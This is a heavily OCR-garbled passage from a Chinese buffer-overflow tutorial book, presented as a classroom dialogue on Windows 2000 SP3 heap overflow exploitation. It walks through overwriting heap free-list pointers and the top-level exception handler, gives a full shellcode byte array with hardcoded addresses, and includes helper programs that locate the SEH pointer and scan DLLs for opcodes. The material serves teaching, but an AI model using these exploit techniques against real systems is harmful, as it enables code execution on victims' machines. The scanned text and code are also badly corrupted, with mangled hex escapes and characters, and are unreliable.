要 调试 程序 ,请 单 击 " 职 消 ”。 











ИН 





"EE 1 果然 弹出 的 对 话 框 成 了 "0x77fcc39e" 指 合 引 用 的 "0x42424242" 内 容 ， 该 内 存 不 能 类 
written 。 我 们 的 计算 非常 正确 哦 ! "大 家 说 。 


“我 们 分 配 的 buf1 是 200 个 字 节 ， 洽 出 点 却 是 第 212 个 字 节 ， 看 起 来 有 点 奇怪 吧 1 " 老 症 说。 


“是 啊 ， 怎 么 会 是 这 个 数字 呢 ? "大 家 都 很 奇怪 。 


这 
不要紧， 分 析 之 后 就 清楚 了 。 我 们 还 是 先 按 步 骤 继 续 吧 1” 


4.2.3 ShellCode 的 特殊 要 求 


“第 二 步 、ShellCode 的 编写 。 我 们 已 经 详细 解释 过 了 ， 但 堆 浴 出 的 ShellCode 有 特殊 的 要 
求 。 


(1) 如 果 浴 出 的 是 黑 认 堆 ， 则 不 能 使 用 网 络 相关 的 了 画 数 ， 比 如 开户 口 、 反 连 等 ShellCode 都 
不 能 使 用 ; 


(2) 可 以 想 办 法 在 ShellCode 中 恢复 默认 堆 ， 然 后 再 使 用 网 络 相 关 ShellCode， 但 有 时 恢复 堆 
后 仍 不 能 用 网 络 编程 的 函数 ; 


(3) 新 建 一 个 堆 ， 不 用 默认 堆 ; 
(4) 干脆 就 不 用 网 络 相 关 的 ShellCode， 只 用 添加 用 户 一 类 的 ShellCode。” 


“可 以 看 出 ， 堆 利用 比较 麻烦 ， 在 ShellCode 中 恢复 堆 这 类 高 级 技巧 会 在 ShellCode 高 级 编程 中 
提 到 。 这 里 就 用 最 简单 的 手段 一 一 打开 DOS 窗 口 。” 


“ 倒 ...... " 台 下 全 时 了 ,“ 又 开 DOS 窗 口 啊 !” 


“这 里 只 是 为 了 说 明 方 法 ， 以 后 用 复 杀 可 行 的 ShellCode 蔡 换 融 行 了 。” 


Qf AER PC ӘД} 


4.2.4 252+ 2llShellCode 


“第 三 步 ， 跳 转 到 ShellCode " 
“这 里 是 天 键 | 和 堆栈 一 样 ， 涉 及 到 系统 内 部 的 处 理 机 制 了 。” 
buf1 = HeapAlloc(hHeap, 0, 200) ， 程 序 动态 分 配 200 字 节 的 buf1， 堆 结构 如 图 4 一 10。” 


系统 返回 给 我 们 的 bufl 从 这 儿 开 始 


| 








— Z= ШШ — 
bufl 的 管理 结构 bu 和 的 操作 守则 ine E тт" 


“先是 8 字 节 'buf1 的 管理 结构 ， 该 结构 对 用 户 是 不 可 见 的 ; 然后 是 系统 返回 给 我 们 能 实际 操作 
的 200 字 节 的 空间 ，'‘buf1’ 就 是 从 这 儿 开 始 的 ; 接着 是 8 字 节 的 下 一 空闲 堆 的 管理 结构 ; 最 后 是 
两 个 双 链 表 指 针 ， 各 4 个 字 节 共 8 个 字 节 。” 

老病 葵 了 一 口气 ， 说 :“ 最 后 的 两 个 双 链 表 指 和 针 才 是 真正 的 关键 。 我 们 用 超 长 字符 串 鹤 

盖 'buf1 的 时 候 ， 其 浴 出 后 的 结构 如 图 4 一 11。” 











buft 的 管理 结构 buf 的 操作 空间 。。 的 管理 结构 "ОШО 


“特别 的 ， 当 用 其 他 字符 为 A、 第 212 字 节 为 B 覆 盖 时 ， 其 结构 如 图 4 一 12。” 


4.2.4 跳 转 到 ShellCode 164 








pm Ш KANAR 
оо 的 管理 结构 bu 和 位 的 操作 空间 ee 两 cria 


“200+8+4=212， 这 束 是 我 们 计算 得 到 浴 出 点 为 212 字 节 的 原因 。 我 们 把 结构 最 后 的 双 链 表 指 
针 宪 盖 了 ， 那 系统 要 使 用 它们 时 当然 会 不 正确 ， 会 出 错 一 一 这 就 是 要 出 现 报错 对 话 框 的 原 
“Hk 1 212 的 位 置 是 这 样 得 到 的 啊 1” 大 家 恢 然 大 悟 。 

“ 报 的 是 write 错误 ， 莫 非 是 要 往 后 一 个 地 址 写 东 西 ? " 宇 强 不 解 地 说 。 


"xp! 当 程 序 分 配 'buf2’ 的 时 候 ， 葡 要 使 用 那 两 个 双 链 表 指 针 了 ， 且 eax 为 前 一 指针 的 值 ， 而 ecx 
为 后 一 指针 的 值 ， 并 作 如 下 操作 : mov?[ecx],eax; mov [еах+4], ecx ， 该 操作 的 目的 是 在 分 
配 内 存 时 改变 链表 的 指向 。” 


“对 刚才 的 程序 来 讲 ， 在 我 们 在 最 后 一 次 覆盖 时 ， 其 结构 和 指针 被 履 盖 为 图 4 一 13 的 的 样子 。” 


"T+ T 





两 个 双 链 表 指 针 


“ 当 系 统 重 新 分 配 '"buf2'， 执 行 到 mov?[ecx],eeax 时 ， 融 等 于 执行 mov [BBBB],AAAA „ #0 
mov[0x42424242],0x41414141 ， 就 是 把 0x41414141 写 入 到 0x42424242 地 址 的 内 存 中 ， 而 
地 址 0x42424242 一 般 是 不 能 写 的 ， 所 以 就 会 报 0x42424242 不 能 写 的 错误 。” 


“IR ! 原来 是 这 样 。” 
“出 错时 程序 束 会 终止 ， 如 果 还 要 执行 下 一 操作 mov [eax+4], есх, 7 mov 


[AAAA+4],BBBB ， 即 mov [0x41414145], 0x42424242 了 ， 丈 是 把 0x42424242 写 人 到 
0x41414145 的 地 址 中 ， 通 前 也 是 会 出 错 的 。” 


“把 这 个 过 程 抽象 出 来 ， 系 统 中 有 what 一 where 的 操作 ， 而 我 们 可 以 把 what 和 where 覆 盖 成 任 
意 的 值 。 当 where 像 上 面 一 样 是 个 随意 的 值 时 ， 会 出 现 写 错误 。 那 我 们 怎样 精心 构 千 where 和 
what， 使 系统 能 跳 转 到 我 们 想 要 的 地 方 一 一 ShellCode 呢 ?” 


老 羡 痛 起 杯子 ， 悠 闲 的 说 :“ 大 家 先 目 己 想 想 ， 讨 论 一 下 各 目的 想法 ， 束 我 一 人 讲 ， 可 能 
都 会 听 困 的 。” 


“就 是 有 what->where 的 操作 ，what 和 where 该 改写 成 什么 呢 ? "老病 再 提示 道 。 


古风 想 了 想 ， 说 :“ 可 以 像 堆 栈 渝 出 利用 一 样 ， 履 重 琅 数 的 返回 点 。 因 为 有 what 一 where 的 操 
作 可 把 what 的 值 构造 成 ShellCode 的 地 址 ， 把 where 的 值 构造 成 某 个 函数 返回 点 的 地 址 ， 这 样 
执行 what 一 where 时 ， 就 可 以 用 ShellCode 的 地 址 履 盖 函数 返回 点 的 值 ， 函 数 返 回 的 时 候 我 们 
的 ShellCode 融 可 以 执行 了 。 如 图 4 一 14。 


шоу [ecx], eax 


сах C CX 





Tm 
老病 说 :“ 不 错 ， 是 个 很 好 的 方法 ， 还 有 想法 吗 ?” 


宇 强 灵机 一 动 ， 愉 声 的 对 小 依 说 :“ 既 然 可 以 覆 和 孟 琅 数 的 返回 品 ， 那 好 像 也 可 以 覆 功 了 落 数 入 口 
点 的 地 方 哦 ?” 


小 倩 想 za í 想 “W, ХЕШ, 应 该 可 以 ! ” 


хе Ел AF848 : "dtu Д есхЕа JS БУЛ УЧ Л. О АНЫШ, з, TAA 
im MATR MNÉIShellCode T, ЖАА 59 НЯ, H ERAT f E4189 
ShellCode。 如 图 4 一 15。 


сах C€ CX 





两 个 双 链 表 指 针 


老病 非常 满意 的 说 : "Very Good ! 挫 浴 出 向 来 以 通用 性 困难 著称 。 各 个 能 利用 的 漏洞 都 有 独 
特 的 利用 方法 ， 上 述 两 种 方法 都 曾 在 实际 中 使 用 过 。 


“在 这 里 我 再 介绍 一 种 比较 基础 的 方法 ， 履 重 默 认 异 党 处 理 的 地 址 。 


4.2.5 和 窗 新 默认 异 弟 处 理 


“在 堆栈 浴 出 中 已 经 讲 过 ，SEH (Windows 的 结构 化 异常 处 理 ) 是 一 种 程序 异常 的 处 理 机 制 ， 在 
Windows 条 统 中 ， 是 按照 链 式 层 状 结构 组 织 的 ， 如 图 4 一 16。” 






指 阿 下 一 个 ERR |.— Fs[ 冲 指向 ] 
АРЗ ФЕ РЕТ МЕҢЕ 





BE Ken ER 


“发 生 异 剃 时 ， 操 作 系统 束 会 查找 异 弟 处 理 链表 ， 找 对 应 这 种 异 弟 的 处 理 程序 ; 找到 了 对 应 的 
义理 程序 后 ， 融 去 执行 处 理 程 序 ， 以 避免 系统 月 溃 。” 


“ 虽 ， 的 确 讲 过 。” 大 家 都 点 点 头 。 


“具体 的 说 ， 其 异常 处 理 过 程 是 : 先 找到 fs:[0] 中 所 包含 的 地 址 ， 这 个 地 址 存 着 上 一 层 异 常 链 指 
针 ， 而 在 这 个 地 址 +4 的 地 方 存放 着 处 理 函 数 的 地 址 ， 操 作 系 统 就 自动 跳 到 这 个 地 址 去 执行 异 
常 父 理 酌 数 。 当 这 个 函数 无 法 对 异常 进行 多 理 时 ， 再 根据 上 一 层 的 异常 链 指针 找到 上 一 层 的 
异常 处 理 指针 来 处 理 。” 

“上 次 堆栈 浴 出 的 时 候 ， 我 们 宪 盖 的 是 fs:[0]|， 这 里 堆 浴 出 也 可 以 这 样 吗 ? "5e om fiis iv] 38. 


"ESAE ! 的 确 可 以 ! 覆盖 的 形式 是 这 样 的 ， 如 图 4 一 17。” 


mov [ecx], eax 


сах CCX 





两 个 "A NET i8 £T 


“但 是 ，" 老 病 话 锋 一 转 ,，“ 这 里 的 where 需 要 是 一 个 人 确切 的 地 址 值 ，fs:[0] 对 于 单线 程 是 比较 固定 
的 ， 但 对 于 多 线程 却 是 不 定 的 。” 


“大 家 回想 一 下 ， 我 们 在 堆栈 浴 出 中 禾 兰 fs:[0] 时 ， 用 的 都 是 相对 地 址 ， 从 来 没有 使 用 过 


才 绝 对 地 
址 。 堆 栈 浴 出 中 ， 履 盖 SEH 和 跳 转 到 ShellCode 的 示意 图 如 图 4 一 18。” 


fs:[0] 和 ebs 指 向 处 理 程序 1 地 址 





”无 用 хи 
АА... AAA 








“我 们 把 第 一 个 异常 父 理 程序 地 址 必 盖 成 CALL EBX 的 地 址 。 当 异常 发 生 时 ， 就 执行 该 地 址 内 


容 一 -CALL EBX， 而 EBX 正 好 在 前 面 4 个 字 节 ， 我 们 把 它 改 为 JMP 047 P BE A ShellCoderh 
To ”老病 又 解释 了 一 通 


“ 哦 【我 们 当时 只 是 知道 fs:[0] 离 缓冲 区 有 多 远 ， 要 多 少 个 无 用 字符 填充 才能 到 达 ， 但 的 确 不 知 
道 当 时 的 fs:[0] 究 竟 是 多 少 啊 1 "大 家 说 道 。 


“对 上 这 里 需要 的 是 确切 地 址 ! 用 fs:[0] 有 时 可 以 ， 有 时 右 不 行 。” 老 病 说 。 

“ 那 怎么 办 呢 ? 即使 每 次 运行 同一 个 程序 ，fs:[0] 好 像 都 要 变 啊 1” 同学 们 又 疑惑 了 。 
“呵呵 ，fs:[0] 地 址 会 变 ， 但 系统 的 默认 异常 处 理 函 数 却 不 会 变 【我们 就 使 用 它 。 ”老病 说 道 。 
小 知识 : PATA Sp ALIE 


ЧА hi SZ РГА BU Sr ЕЧ АОС КАА Н SP е}, ЖЮН ISA A Sr tp 2 EE TE +T 2 2 EE Se 
第 情况 。 


上 默认 异 剃 处理 指针 通过 如 下 图 数 来 设置 : 


SetUnhandledExceptionFilter(??LPTOP LEVEL EXCEPTION FILTER lpTopLevelExceptionFilter) 


上 默认 异 弟 处 理 指针 通过 如 下 图 数 来 调用 : 


LONG UnhandledExceptionFilter(STRUCT | EXCEPTION POINTERS *ExceptionInfo); 


Бял “А ЕЛЕ, EIB H BERE, Е Т AET SN Xm 
话 框 的 原因 。 


“我 们 一 起 来 看 看 吧 ! "老师 说 道 ,“ 用 IDA 打 开 kernel32 分 析 ， 在 Functions 中 选 
中 ‘SetUnhandledExceptionFilter' 就 会 跳 到 如 图 4 一 19 的 代码 。 意 思 是 把 异常 处 理 程序 地 址 放 
入 0x77EB63B4 中 ， 即 Win2000 SP3 上 默认 异 党 的 处 理 指针 是 0x77EC044c。” 






= IDA view-A E ial xl 
.Ltext:77E68238 public SetUnhandledExceptionFilter a| 
.Ltext:77E68238 SetünhandledExceptionFilter proc near 
.Ltext:77E6R238 — 
.Ltext:77E68238 lpTopLeuelExceptionFilter- dword ptr 4 
.Ltext:/7E6R238 
.text:/7E6hn238 mou ecx, [esp*«lpTopLeuelExceptionFilter] 
.Lext://E6Rn23C mou eax, dword /7/ECONHRAC 
.Lext:/7/E6Rn251 mou dword Z7/ECBRhAC, ecx 
.Lext:77E68R257 retn 4 
.text:77E68257 SetUnhandledExceptionFilter endp 
.Lext:77E68R257 
-text:77E6A24A ; ОЯЗ ОООО DDR DR EE ER ER EDD D ШЕ E RD 
.Ltext:77E6R2^f 
.text:77E6R2hh loc 77E6R2Ah: ; CODE XREF: GetFilefRttr _ 





“4 8 AF862 EB ERE, XRUnhandledExceptionFilterPqZ&, 6 3 sb zecall 
[0x77EC044c]， 即 执行 0x77EC044c 指 向 的 异常 处 理 程 序 ， 那 我 们 可 以 ..…...” 


“ ! 我 们 可 以 把 where 赋 成 0xX77EC044c1” 


“对 1 我 们 把 where 才 盖 成 0x77EC044c，what 履 盖 成 ShellCode 的 地 址 ， 如 图 4 一 20。” 


mov [ecx], eax 





c a 





两 个 双 链 表 指 针 


“ 那 执行 了 mov[ecx],eax 后 ，0x77EC044c 里 惑 是 我 们 ShellCode 的 地 址 。 当 发 生 异 党 时， 系 
统 会 执行 call [0x77EC044c] ， 当 然 束 跳 到 我 们 的 ShellCode 中 了 。” 


"Yeah ! 可 以 跳 转 了 1 "全 班 同 学 都 很 高 关 。 


“注意 ， 这 里 有 个 小 问题 ， mov[ecx],eax 后 ， 跟 着 还 有 一 句 mov [eax 十 4], ecx ， 这 样 不 但 把 
shellcode 地 址 写 进 默认 异常 处 理 地 址 中 ， 也 会 把 默认 异常 处 理 地 址 写 进 [shellcode 地 址 +4] 的 


内 存单 元 当中 ， 把 Shellcode 中 的 指令 破坏 了 。” 


"BEN... 
要 解决 这 个 问题 ， 我 们 可 以 用 JMP 6 这 样 的 指令 来 代替 nop， 这 样 就 能 跳 过 后 面 被 破坏 的 字 


现在 回 到 我 们 的 程序 中 ， 把 它 合 起 来 吧 1 "老病 说 道 ，“ 先 是 208 字 节 禾 盖 挥 ‘buf1' 的 空间 和 空 
ЖВЈЕЗ 4544 ; 然后 是 4 字 节 ShellCode 的 地 址 ， 最 后 是 4 字 节 异常 处 理 地 址 。 如 图 4 一 21。” 


D CANES —- 
"Жылым. ип x jg 
"| ТУГ. ГГ». 
Jrnpó Jrnpo.... 





| | T" E Е 22908 penpe 
bufl 的 管理 结构 bufl 的 操作 空间 有 管理 结构 指针 


“但 这 里 的 ShellCode 的 地 址 是 多 少 呢 ?” 宇 强 问 道 。 
"mfi", “我 们 先 把 ShellCode 保 存在 'mybuf 里 面 ， 所 以 直接 把 'mybuf 的 地 址 读 出 


来 填 人 即 可 。” 
Ж) 1 mybuf 是 数组 ， 那 地 址 还 是 会 变 ， 还 是 不 通用 啊 | "大 家 觉得 很 奇怪 。 


“ 虽 ， 这 样 做 的 确 不 通用 ， 后 面 我 们 会 改进 的 ， 这 里 先 试 试 效果 | "老病 说 道 , “构造 出 来 


的 'mybuf 是 这 样 的 :” 


char mybuf[240] = 
"\xeb\x06" 
"\xeb\x06\xeb\x06\xeb\x06\xeb\x06\xeb\x06" 
"NxebNx06NxebNx06NxebNx06NxebNx06NxebNx06'' 
"NxebNx06NxebNx06NxebNx06NxebNx06NxebNx06'' 
"NxebNx06NxebNx06NxebNx06NxebNx06NxebNx06'' 
"NxebNx06NxebNx06NxebNx06NxebNx06NxebNx06'' 
"NxebNx06NxebNx06NxebNx06NxebNx06NxebNx06'' 
"NxebNx06NxebNx06NxebNx06NxebNx06NxebNx06'' 
"NxebNx06NxebNx06NxebNx06NxebNx06NxebNx06'' 
"NxebNx06NxebNx06NxebNx06NxebNx06NxebNx06'' 
"\х900\х90\х90\х90\х90\х90\х90\х90\х90" //Jmp 06 和 NOPS 共 101 bytes 
// 下 面 是 开 DOS 窗 口 的 ShellCode， 有 107 字 节 
"\x55\xX8B\xEC\x33\xCO\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53" 
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6 
"\x45\xXFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA" 
"\x64\x9f\xE6\x77" //SP3 loadlibrary 地 址 9x77e69f64 
"\x52\x8D\x45\xF4\x50" 
"\xFF\x55\xFO" 
"NXBBNX8BNXECNX83NXECNX2CNXB8NX63NX6FNX6DNX6DNX89NX45NXFANXB8NX61NXGENX64NX2E" 
"NX89NX45NXF8NXB8NX63NX6FNX6DNX22NX89NX45NXFCNX33NXD2NX88NX5B5NXFFNX8DNXABNXF A" 
"\x50\xB8" 
"Nxc3NxafNx01Nx78" //sp3 system 地 址 909x7801afc3 
"\xFF\xDO" 
// 上 面 一 共 208 字 节 ， 接 下 来 就 是 ShellCode 地 址 和 顶层 异常 处 理 地 址 
"\x40\x60\x40\xFF\x4c\x04\xec\x77" 


E 


“运行 报错 ， 如 图 4 一 22。 可 以 看 到 ‘mybuf 的 地 址 是 0x00422A40， 所 以 我 们 要 把 ShellCode 的 
地 址 (有 即 What 的 位 置 ) 赋 成 它 。” 










查看 (WW ЦЫ МА) 
q mi ЖЕГЕ АШ 








+] фз 


| 


ot ГГҮҮҮҮҮҮГҮ | EAE [Т ^. m PPS ЖЕТЕР Пн 
ji as i= Pq 51 34. ы дат. Ж п Аз = pe % "m E | | 
үү s 214 5 RE 2 En. "TI icd ТП ir _ | | 





allEsi.obj 


- 应 用 程序 错误 j 
"0x77fcbde5" 指令 引用 的 "0xfffffffe" 内 存 。 该 内 存 不 能 为 read'。 


要 调试 程序 ， 请 单 击 ` 职 稍 "。 


Eg] 

Eg 
| B 
由 (SE | 
“РӘ 回收 站 
L2 15 | 
由 15А vul6.pch vul&.pdb 
“pm " TER = 2 = Bl) 














“注意 啊 1 tmybuf BE ZE 0083, stropy п а. | FIT ERAT To PK, TE 
main 里 面 找 贝 完成 后 ， 册 把 ff 改 回 00。 大 家 参看 程序 heapvul1Exp.c (光盘 有 上 收录) 。 编 译 并 
执行 ， 弹 出 了 一 个 DOS 对 话 框 ， 如 图 4 一 23。” 


wul6 - ЕФ ve ++ - [vul6.c] Е E — : - |@[ x] 
_|@[ x! 




















char xbuf1, 
int i; 


xbuft? ; 





E gs vul | 





hHeap-HeapCreate(HERP BEHERRTE ESCEPTIUHS, Bx1BBBB, BEFFFFF); 
printf('"mybuf addr = $pXn",mybuf); 

bufi = Heaphlloc(hHeap, B, 288); 

strcpy(buf1,myubuf) ; 


buF1[211] = 0x8; /l'shellcodejlht ex80406038 写成 0x00n06050 


printf("bufl1 = $s Xn" ,buf 1); 







buf? = HeapHRlloc(hHeap, B, 16); 

HeapFree(hHeap, B, bufi); [ кл шш: = lal 
HeapFree(hHeap, B, buf2); ЖАШ А АНИ IS ADT o" 

getch); 

return 8; 






“ 哦 1! 成 功 了 
“虽然 这 个 exp 很 简陋 ， 但 也 是 实际 可 用 的 纵 形 。 我 们 继续 讨论 ， 改 进 利用 方式 І" 
小 知识 : 0x00 和 截断 间 题 


天 于 ShellCode 中 含有 0x00， 并 不 是 赋值 时 被 截断 ， 赋 的 值 都 会 在 内 存 里 面 。 比 如 字符 叶 
0x0102000304， 都 会 存 进 去 ; 但 在 C 语 言 中 ， 字 符 串 结束 的 标志 是 0x00， 所 以 像 使 用 strcpy 
БЧА], сусу 结束 ， 不 会 拷贝 后 面 的 0304 ; 而 改 成 emcpy 下 搂 捞 贝 内 存 
字符 串 长 度 ， 瑞 不 会 被 00 截 断 ， 网 络 传输 时 ， 佛 send 函数 也 是 发 送 指定 长 度 的 字符 串 ， 不 会 
被 00 截 断 。 


4.2.6 定位 的 改进 一 一 call [esi+0x4c] 


老病 小 结 了 一 下 : “默认 异常 处 理 地 址 在 Win2000 SP3 下 是 0x77ec044c。 但 在 不 同系 统 、 不 同 
SP 下 ， 其 值 是 不 一 样 的 。 我 们 可 像 刚才 一 样 ， 用 IDA 反 汇编 kernel32.dll 分 析 ， 但 很 研 烦 ; 也 
可 用 isno 写 的 GetTopSeh.c 来 获得 默认 异常 处 理 地 址 ， 程 序 如 下 ， 我 加 上 了 一 些 注 释 。 ' 


#include <stdio.h> 
#include «windows.h» 
void main() 


unsigned int sehaddr; 
int *un; 
HMODULE hk - LoadLibrary("KERNEL32.d11"); 
un = (int *)GetProcAddress(hk, "SetUnhandledExceptionFilter"); 
// 找 到 SetUunhandledExceptionFilter 函 数 的 地 址 
_аѕт{ 
mov еах, ип 
add еах, 5 
mov ерх, [еах]? 
mov ѕеһаааг, ерх // HAFIR ESNE ñ Е ЗЛ Е АР НЫНЕ, 


} 

printf("the top seh: Өх%х\г\п", ѕеһадаг); Лл ЕНЕ ТЕПН 
_getch(); 

return; 


“对 比 IDA 里 面 的 代码 ， 上 应 该 很 容易 理解 ， 程 序 是 读 出 SetUnhandledExceptionFilter 芳 数 开 始 
后 第 5 个 字 节 的 内 容 ， 即 异常 处 理 指针 的 存放 位 置 ， 然 后 打印 出 来 。 执 行 效 果 如 图 4 一 24， 在 
我 的 Win2000 SP3 机 器 上 ， 上 默认 异常 处 理 地 址 是 0x77ec044c。” 


L i 5 | [FindTopSEH = ||Win32 Debug JE 丁丁 由 t (sp «m 


Hinclude <stdio.h> 
Hinclude «windous.h? 
uoid main() 











{ 
unsigned int sehaddr; 
int wun; 
HMODULE hk = LoadLibrargy(" KERHEL32 .d11") ; 
= (int «)GetProcfiddress(hk ,"SetUnhandledExceptionFilter"); 
T ЕСГ 
mou eax,un the top seh: Bx77ecB44c 
add eax,5 
mou ebx,[eax] 
mou sehaddr ‚ебх 
, 
printF("the top seh: 8x$xXrXn',sehaddr) ; 
_getch(); 
return; 
) >| 
' | 


“有 了 这 个 方便 多 了 ! "大 家 说 道 ，“ 我 们 可 把 所 有 系统 的 默认 异 弟 处 理 地 址 都 读 出 来 ， 然 后 存 
储 起 来 供 以 后 使 用 。” 


“但 是 ..…...” 古 风 问 道 : “Where 是 可 以 正确 确定 了 ， 但 what 呢 ?还 是 不 能 确定 啊 1” 




















Q 有 版 缓冲 区 浴 出 教程 


“对 【 刚才 ShellCode 的 地 址 是 在 主 程序 里 曾 接 读 出 来 的 ， 哩 然 我 们 可 用 NOP 上 暴力 扩大 
ShellCode 的 范围 ， 但 通用 性 始终 不 好 。 我 们 料 它 改 进 一 下 吧 ! "老病 说 道 。 

“怎么 改进 呢 ? 有 什么 东西 指向 扒 的 数据 吗 ?" 古 颇 感 兴趣 。 

“呵呵 ，Windows 2000 作 顶层 异常 父 理 时 ，esi+0x4C 正 好 指向 下 一 个 堆 管理 结构 ， 如 图 4 一 
25。 大 家 想 想 ， 怎 么 做 可 以 改进 定位 呢 ?” 


“б^ 7ISN 5 


顶层 异常 处 理 时 : esi+0x4C 








bu 的 管理 结构 。 bufl 的 操作 空间 pagan PRE 


大 家 个 个 眉头 紧 感 。 
1 | " 宇 强 一 下 叫 了 出 来 , “маі рў, call [esi 十 0x4c] 的 地 址 。 这 样 异常 发 生 时 ， 系 
统 就 会 执行 call [esi 十 0x4c] ， 从 而 到 达 下 一 个 空闲 堆 的 管理 结构 中 。 在 那里 ， 我 们 放 上 JMP 


OF 指 合 ， 就 可 跳 过 后 面 的 what 和 where， 最 后 到 达 ShellCode。” 
“呵呵 ， 很 好 ， 上 来 画 一 下 示意 图 吧 ! "тӘ, 
宇 强 走 上 讲台 ， 拿 起 粉笔 ， 画 出 了 图 4 一 26 所 示 的 利用 思路 。 
1 What->where: 顶层 异常 处 理 被 禾 盖 为 call [esit+0x4O] 的 地 址 
2 Where->what+4: 引发 顶层 异常 处 理 


3 顶层 异常 处 理 执行 call [esit0x4c] 4 到 这 里 


esSiHOX4C 5. BESIShellCode 


ShellC ode 





bufl 的 管理 结构 bufl 的 操作 空间 下 一 空闲 堆 ”两 个 双 链 表 
i 的 管理 结构 指针 


“首先 覆盖 what 为 call [esi-- Ox4c] 的 地 址 ，where 为 默认 异常 处 理 的 地 址 0x77EC044C，” 宇 强 
边 画 边 解 释 , “这样 Whha 一 where 操作 时 ，0x77EC044C 就 会 被 覆盖 成 call [esi 十 0x4c] 的 地 
址 ; 如 果 发 生 顶 层 异 常 处 理 ， 就 会 跳 到 call [еѕі+0х4с] 指 今 的 地 方 ; 一 执行 call [еѕі+0х4с] 就 


call [esi+0x4c] 





4.2.6 定位 的 改进 


到 了 我 们 能 操控 数据 的 位 置 。” 
“а. | 融 是 这 样 1" 大 家 都 很 先 同 宇 强 的 的 说 法 。 
“但 有 个 地 方 还 不 明白 ， 什 么 时 候 会 发 生 默认 异 剃 处理 呢 ?" 宇 强 从 台 上 下 来 时 间 。 


{IRF ZME, “大 家 都 要 同 于 强 学 习 啊 | 要 敢于 表达 目 己 的 思想 ， 也 要 敢于 提出 目 己 的 
问题 ! 只 有 经 过 思考 ， 大 家 的 思维 才能 得 到 锻炼 和 提高 。” 


“而 发 生 异 常 处 理 的 时 间 ， 是 what->where 后 ， 有 一 个 where what+4 的 操作 ， 如 果 保 证 
what+4 的 地 址 不 可 写 ， 那 就 可 以 引发 顶层 异常 处 理 了 。” 


“了 哦 ， 这 下 思路 清楚 了 。" 古 风 一 下 子 明白 了 。 

“我 们 赶紧 合 起 来 利用 吧 ! "同学 们 都 迫不及待 。 

“HE, " 老病 提醒 道 ,“ 大 家 发 现 没有 ， call [еѕі+0х4С] 的 地 址 是 多 少 呢 ?我 们 还 没有 呢 【 ' 
“对 啊 ! call [esi+0x4C] 的 地 址 还 没 找 呢 1 


“我 们 可 把 查找 JMP ESP 的 程序 FindJmpEsp.cpp 稍 微 改 进 一 下 ， 让 它 可 以 找 其 他 指令 。 我 们 
先 找到 call [esi+0x4C] 的 机 器 码 是 什么 ， 然 后 在 各 个 dll 中 找 这 样 的 机 器 码 。” 老 炳 说 。 


“首先 ， 我 们 写 一 个 简单 的 钦 套 汇编 的 程序 ， 如 下 : 


asm 


call [esi+0x4C] 
у 


“和 前 几 节 课 的 方法 一 样 ， 我 们 在 VC 中 按 F10 调 试 ， 再 点 'Debug' 工 具 栏 中 的 'Dissassble' 按 
钮 ， 然 后 点 鼠标 右键 ， 在 弹出 菜单 中 选中 'code byte'， 此 时 会 出 现 call [esi+0x4C] 的 机 器 码 
J 如 图 图 4 一 27。 


ОЛ zx HX G ДЕ 


=- FinmdCal1Es1 Microsoft Yizual C++ [break] [Disassembly] 





|& File Edit View Insert Projeet Debug Tools [river2tudio Window Help | -|#|х| 
ашна * шю о-о. те | - a. Eaa |o HPF wl AR anaE 
[тезге | -| Ф main -| 这 = Ф + Æ, ' Jh | 














































=|| [Äl global member: 

ОбаВТ ЕВЕ 57 edi 

HB4H1EBSF 39 05 FB таш dword ptr [eb5p-18h],esp 

HüaHT1E92 3D 7D 84 lea edi,[ebp-7Ch] 

Gag1Qg0C по iE OD йй üü mou ecx,1iüh 

почт оа 38 LC CC CE EE mau eax,BCCCCECCECh 

BaagiEOF 7-3 RB rep stos duord ptr [edi] 

5: azm 

ё: 

T: Call [р<=1+йхАаг] 
Eb nook FF 56 nr Call duord ptr [esitkCh] 

8: 

g: bool we Ioa : 

HüaH1EAM Có А5 ЕС BH mou byte ptr [ebn-15h],H 

18: HIBSTAHCE hs 

11: TCHAR dliname[] = "User32"; 

ИНЧЕН 341 бї би Hz HH mau Pax,[string "Userdz" (WHN25H6tC) | 

пао ойо 39 45 EH mau (unra ptr [enp-28hn],eax 

пва 1 08050 56 EE BO Zü 60 H? BO mov CH word ptr [string "üzerd2"7-h (B8h26070)] 

BBuBTEB7 56 89 др ЕА mau word ptr [ebp-TCh],cx 

палет СВЕ 38 15 7? 68 42 ПП mau dl.hbyte ptr [string "User32"«6 (8045280872)] 

00901081 38 55 E^ mau byte ptr [еһр-—1Ёһ] ;dl 

12: if(argc?1] 

HüaHT1ECA 33 70 ЙЧ 0 cnp dword ptr [eop*8],1 

ОВЕВТЕСВ РЕ 13 jle nain*üáDh {00301 000) - 
а a 
м Contest: [main[int, char * *J e] 


Bx00000001 
gx00430e6s "F:XStudyV[2 Ti oboo АДЕ НАМЕДЕ NDebugNFindCallEsi exe" 





“这 下 我 们 知道 了 call [esi+0x4C] 的 机 器 码 是 FF 56 4C， 我 们 把 FindJmpEsp.cpp 改 成 在 dll 中 
找 机 器 码 FF 56 4C 的 程序 (FindCallEsi4C.cpp) ， 如 下 :” 


4.2.6 定位 的 改进 一 call [esi+0x4c] 176 


#include<iostream.h> 
#include<windows .h> 
int main(int argc, char ** argv) 
{ 
bool we_loaded_it = false; 
HINSTANCE h; 
TCHAR dllname[] = "User32"; // 上 默认 查找 user32.dll 里 面 的 指 命 
if(argc>1) 


strcpy(dllname,argv[1]); 


h = GetModuleHandle(dllname); 
if(h == NULL) 


h = LoadLibrary(dllname); //ЛПЖ411 
if(h == NULL) 


cout<<"ERROR LOADING DLL: "<<dllname<<endl; 
return 1; 


we_loaded_it = true; 
BYTE* ptr 


bool done 
for(int y 


(BYTE*)h; 
false; 
0;!done;y++) // 在 dll 中 查找 FF 56 4c 并 打印 


try 

{ 

if(ptr[y] == OxFF && ріг [у+1] == 0x56 && рїіг[у+2] == Ox4c ) 
{ 


int pos = (int)ptr + y; 
cout<<"OPCODE found at Ox"'««hex««pos««endl; 


} 


catch(...) 


{ 
cout<<"END OF "««dllname««" MEMORY РЕАСНЕр"<<епа1; 


done = true; 


} 


} 
if(we loaded it) FreeLibrary(h); // 释 放 d11 
return 0; 


“这 个 程序 如 果 不 带 参数 ， 默 认 在 user32.dll 中 查找 机 器 码 ; 也 可 将 要 查找 的 dll 名 作为 参数 运 
